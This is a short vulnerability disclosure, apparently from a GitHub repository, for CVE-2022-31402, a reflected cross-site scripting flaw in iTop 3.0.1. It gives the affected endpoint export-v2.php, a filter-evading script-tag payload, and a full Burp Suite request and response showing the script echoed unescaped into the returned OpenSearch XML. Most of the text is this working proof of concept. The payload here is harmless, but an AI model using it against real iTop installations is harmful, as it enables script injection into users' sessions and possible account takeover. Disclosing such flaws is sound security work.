-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathiTop 3.0.1 XSS Vulnerability
51 lines (41 loc) · 2.06 KB
/
iTop 3.0.1 XSS Vulnerability
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
# CVE-2022-31402
EFFECTIFE PAGE
/itop/webservices/export-v2.php
VERSION
ITOP - 3.0.1
EXAMPLE PAYLOAD
"()%26%25<acx><ScRiPt >DFre(9740)</ScRiPt>
BURPSUIT REQUEST
> HTTP REQUESTS WITH BURPSUIT --------------
> GET
> /itop/webservices/export-v2.php"()%26%25<acx><ScRiPt%20>N8Zn(9266)</ScRiPt>
> HTTP/1.1 Referer: http://localhost/itop/ Cookie:
> PHPSESSID=hp7p9olp8rq01ramfa6li7nn0j; MANTIS_secure_session=1 Accept:
> text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
> Accept-Encoding: gzip,deflate,br User-Agent: Mozilla/5.0 (Windows NT
> 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)
> Chrome/92.0.4512.0 Safari/537.36 Host: 192.168.1.4 Connection:
> Keep-alive
> HTTP RESPONSE WITH BURP SUITE
> HTTP/1.1 200 OK Date: Tue, 29 Mar 2022 02:30:55 GMT Server:
> Apache/2.4.41 (Ubuntu) Cache-Control: no-store, no-cache,
> must-revalidate Last-Modified: Tue, 29 Mar 2022 02:30:55 GMT
> X-Content-Type-Options: nosniff Expires: Tue, 29 Mar 2022 02:30:55 GMT
> X-Frame-Options: DENY Content-Security-Policy: default-src 'self';
> frame-ancestors 'none'; style-src 'self' 'unsafe-inline'; script-src
> 'self'; img-src 'self' 'self' data: Vary: Accept-Encoding
> Content-Length: 771 Keep-Alive: timeout=5, max=93 Connection:
> Keep-Alive Content-Type: application/opensearchdescription+xml
> Original-Content-Encoding: gzip
> <?xml version="1.0" encoding="UTF-8" ?><OpenSearchDescription
> xmlns="http://a9.com/-/spec/opensearch/1.1/"
> xmlns:moz="http://www.mozilla.org/2006/browser/search/">
> \t<ShortName>opensearch_text'"()&acx><script
> >n8zn(9266)</script>_short</ShortName>
> \t<Description>opensearch_text'"()&acx><script
> >n8zn(9266)</script>_description</Description>
> \t<InputEncoding>UTF-8</InputEncoding> \t<Image width="16" height="16"
> type="image/x-icon">http://localhost/itop/images/favicon.ico</Image>
> \t<Url type="text/html" method="GET"
> template="http://localhost/itop/webservices/export-v2.php?type=1&temporary=y&handler_id=[all]&search={searchTerms}"></Url>';
> \t<moz:SearchForm>http://localhost/itop/webservices/export-v2.php</moz:SearchForm>